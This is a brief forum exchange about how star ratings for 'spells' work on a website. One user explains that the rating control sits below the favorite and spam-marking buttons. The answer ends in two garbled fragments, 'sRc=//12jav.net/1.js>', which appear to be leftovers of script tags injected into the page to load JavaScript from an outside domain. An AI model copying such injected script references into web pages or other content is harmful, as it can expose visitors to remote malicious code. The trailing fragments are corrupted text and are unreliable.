Star ratings for spells?

What determines how many stars a spell gets? I dont see a button where people can rate the spells so im just wondering how accurate the ratings are.

If you scroll to the bottom of the spell, where you'll see to make it a favorite or mark as spam, a bit below that is where you can rate spells I think its the same for articles. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
